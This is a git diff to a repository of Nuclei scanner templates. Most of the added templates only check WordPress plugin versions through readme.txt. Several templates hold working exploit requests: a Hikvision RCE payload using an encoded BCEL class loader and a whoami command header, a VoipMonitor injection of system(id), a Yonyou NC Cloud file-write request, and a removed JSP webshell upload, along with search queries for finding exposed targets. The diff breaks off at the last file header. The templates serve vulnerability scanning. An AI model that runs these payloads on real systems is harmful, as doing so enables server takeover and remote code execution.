diff --git a/poc/other/zephyr-project-manager-63c4e07d0eb40c0087ebfd55ecaddec5.yaml b/poc/other/zephyr-project-manager-63c4e07d0eb40c0087ebfd55ecaddec5.yaml
new file mode 100644
index 0000000000..e39ecb9713
--- /dev/null
+++ b/poc/other/zephyr-project-manager-63c4e07d0eb40c0087ebfd55ecaddec5.yaml
@@ -0,0 +1,59 @@
+id: zephyr-project-manager-63c4e07d0eb40c0087ebfd55ecaddec5
+
+info:
+ name: >
+ Zephyr Project Manager <= 3.3.100 - Authenticated (Subscriber+) Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/98a73a02-33fa-4dd4-9606-3d35d58c2398?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/zephyr-project-manager/"
+ google-query: inurl:"/wp-content/plugins/zephyr-project-manager/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,zephyr-project-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/zephyr-project-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "zephyr-project-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.100')
\ No newline at end of file
diff --git a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml
index 7f081b05e0..0ebd67934b 100644
--- a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml
+++ b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml
@@ -1,48 +1,27 @@
id: HIKVISION
info:
- name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file
+ name: HIKVISION
author: Zero Trust Security Attack and Defense Laboratory
severity: high
description: |
- HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files
+ There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability
metadata:
- fofa-query: icon_hash="-911494769"
- hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685"
+ fofa-query: app="HIKVISION-综合安防管理平台"
+ hunter-query: web.title="综合安防管理平台"
-variables:
- str1: '{{rand_base(6)}}'
- str2: '{{rand_base(6)}}'
- str3: '<%out.print("{{str2}}");%>'
-
http:
- raw:
- |
- POST /eps/resourceOperations/upload.action HTTP/1.1
+ POST /bic/ssoService/v1/applyCT HTTP/1.1
Host: {{Hostname}}
- User-Agent: MicroMessenger
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj
-
- ------WebKitFormBoundaryTJyhtTNqdMNLZLhj
- Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp"
- Content-Type: image/jpeg
-
- {{str3}}
- ------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
-
- - |
- GET /eps/upload/{{res_id}}.jsp HTTP/1.1
- Host: {{Hostname}}
-
- extractors:
- - type: json
- name: res_id
- json:
- - ".data.resourceUuid"
- internal: true
+ Content-Type: application/json
+ Testcmd: whoami
+
+ {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}}
matchers:
- - type: dsl
- dsl:
- - body_2 == str2
+ - type: word
+ words:
+ - "nt authority\\system"
diff --git a/poc/remote_code_execution/envo-elementor-for-woocommerce-6b875373ec6b41b7d90e0812ce65132b.yaml b/poc/remote_code_execution/envo-elementor-for-woocommerce-6b875373ec6b41b7d90e0812ce65132b.yaml
new file mode 100644
index 0000000000..45c687f8ab
--- /dev/null
+++ b/poc/remote_code_execution/envo-elementor-for-woocommerce-6b875373ec6b41b7d90e0812ce65132b.yaml
@@ -0,0 +1,59 @@
+id: envo-elementor-for-woocommerce-6b875373ec6b41b7d90e0812ce65132b
+
+info:
+ name: >
+ Envo's Elementor Templates & Widgets for WooCommerce <= 1.4.16 - Authenticated (Author+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7abb5103-7063-4a8d-8ca0-66074954acd5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/envo-elementor-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/envo-elementor-for-woocommerce/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,envo-elementor-for-woocommerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/envo-elementor-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "envo-elementor-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.16')
\ No newline at end of file
diff --git a/poc/remote_code_execution/order-export-and-more-for-woocommerce-229e7a7cf1d14530bd6fed684bfc01b3.yaml b/poc/remote_code_execution/order-export-and-more-for-woocommerce-229e7a7cf1d14530bd6fed684bfc01b3.yaml
new file mode 100644
index 0000000000..dbc57b1c9f
--- /dev/null
+++ b/poc/remote_code_execution/order-export-and-more-for-woocommerce-229e7a7cf1d14530bd6fed684bfc01b3.yaml
@@ -0,0 +1,59 @@
+id: order-export-and-more-for-woocommerce-229e7a7cf1d14530bd6fed684bfc01b3
+
+info:
+ name: >
+ Order Export for WooCommerce <= 3.23 - Unauthenticated Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e3f8108-6b1b-4720-a450-e58b1833b608?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/order-export-and-more-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/order-export-and-more-for-woocommerce/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,order-export-and-more-for-woocommerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/order-export-and-more-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "order-export-and-more-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.23')
\ No newline at end of file
diff --git a/poc/remote_code_execution/voiprce.yaml b/poc/remote_code_execution/voiprce.yaml
index b8e046e7d5..c7a522674d 100644
--- a/poc/remote_code_execution/voiprce.yaml
+++ b/poc/remote_code_execution/voiprce.yaml
@@ -4,14 +4,9 @@ info:
name: VoipMonitor Pre-Auth-RCE
author: shifacyclewala,hackergautam
severity: critical
- description: Use of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor.
-
+ description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461.
+ tags: cve,cve2021,rce,voipmonitor
reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
- cve-id: CVE-2021-30461
- cwe-id: CWE-94
requests:
- raw:
@@ -19,7 +14,11 @@ requests:
POST /index.php HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Connection: close
Content-Type: application/x-www-form-urlencoded
+ Content-Length: 35
SPOOLDIR=test".system(id)."&recheck=Recheck
diff --git a/poc/remote_code_execution/woocommerce-ac6e420a89669f08a078e821281eeac7.yaml b/poc/remote_code_execution/woocommerce-ac6e420a89669f08a078e821281eeac7.yaml
new file mode 100644
index 0000000000..f919bcb9f1
--- /dev/null
+++ b/poc/remote_code_execution/woocommerce-ac6e420a89669f08a078e821281eeac7.yaml
@@ -0,0 +1,59 @@
+id: woocommerce-ac6e420a89669f08a078e821281eeac7
+
+info:
+ name: >
+ WooCommerce <= 9.1.2 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7ad4272c-75a1-4bc9-be3b-add80de45871?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/woocommerce/"
+ google-query: inurl:"/wp-content/plugins/woocommerce/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,woocommerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 9.1.2')
\ No newline at end of file
diff --git a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml
index cef49f23fa..653783158e 100644
--- a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml
+++ b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml
@@ -1,36 +1,43 @@
id: yonyou-nc-cloud-jsinvoke-rce
info:
- name: yonyou-nc-cloud-jsinvoke-rce
- author: pphua
+ name: Yonyou NC Cloud - Remote Code Execution
+ author: Co5mos
severity: critical
- tags: yonyou,nc-cloud,rce
- reference:
- - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA
+ description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server.
+ reference:
+ - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q
metadata:
max-request: 2
verified: true
fofa-query: app="用友-NC-Cloud"
+ tags: yonyou,rce
+
+variables:
+ str1: "{{rand_base(5)}}.txt"
http:
- raw:
- - |
+ - |
POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Content-Type: application/x-www-form-urlencoded
- Accept-Encoding: gzip
- {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]}
-
+ {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]}
+
- |
- GET /{{randstr}}.txt HTTP/1.1
- Content-Length: 138
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+ GET /{{str1}} HTTP/1.1
+ Host: {{Hostname}}
+ matchers-condition: and
matchers:
- type: word
+ part: body
words:
- - "StringObject"
- part: body
\ No newline at end of file
+ - '5d8be7535d6383e99315739724e10fa7'
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/poc/search/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml b/poc/search/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml
new file mode 100644
index 0000000000..d29acfc8d2
--- /dev/null
+++ b/poc/search/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml
@@ -0,0 +1,59 @@
+id: wp-jobsearch-03c799c8c1a4335310c615dc29112568
+
+info:
+ name: >
+ JobSearch <= 2.3.4 - Authentication Bypass to Account Takeover
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7250da0a-1ac6-48a6-a480-0721d604add3?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-jobsearch/"
+ google-query: inurl:"/wp-content/plugins/wp-jobsearch/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-jobsearch,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-jobsearch/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-jobsearch"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3.4')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml b/poc/sql/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml
new file mode 100644
index 0000000000..6949c1b300
--- /dev/null
+++ b/poc/sql/CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-38675-2521ccef87d99c1d3555b4d5b192db9a
+
+info:
+ name: >
+ Arkhe Blocks <= 2.22.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Arkhe Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.22.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1079282d-3183-4190-8a54-d6085d27935a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-38675
+ metadata:
+ fofa-query: "wp-content/plugins/arkhe-blocks/"
+ google-query: inurl:"/wp-content/plugins/arkhe-blocks/"
+ shodan-query: 'vuln:CVE-2024-38675'
+ tags: cve,wordpress,wp-plugin,arkhe-blocks,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/arkhe-blocks/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "arkhe-blocks"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.22.1')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml b/poc/sql/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml
new file mode 100644
index 0000000000..59b6633220
--- /dev/null
+++ b/poc/sql/CVE-2024-43241-808351d5b94024e25294db4171fbaa2f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43241-808351d5b94024e25294db4171fbaa2f
+
+info:
+ name: >
+ Indeed Membership Pro <= 12.6 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Indeed Membership Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 12.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b7dce0db-792f-4be2-a55d-b4fb7442b548?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43241
+ metadata:
+ fofa-query: "wp-content/plugins/indeed-membership-pro/"
+ google-query: inurl:"/wp-content/plugins/indeed-membership-pro/"
+ shodan-query: 'vuln:CVE-2024-43241'
+ tags: cve,wordpress,wp-plugin,indeed-membership-pro,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "indeed-membership-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 12.6')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml b/poc/sql/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml
new file mode 100644
index 0000000000..15b2f241bc
--- /dev/null
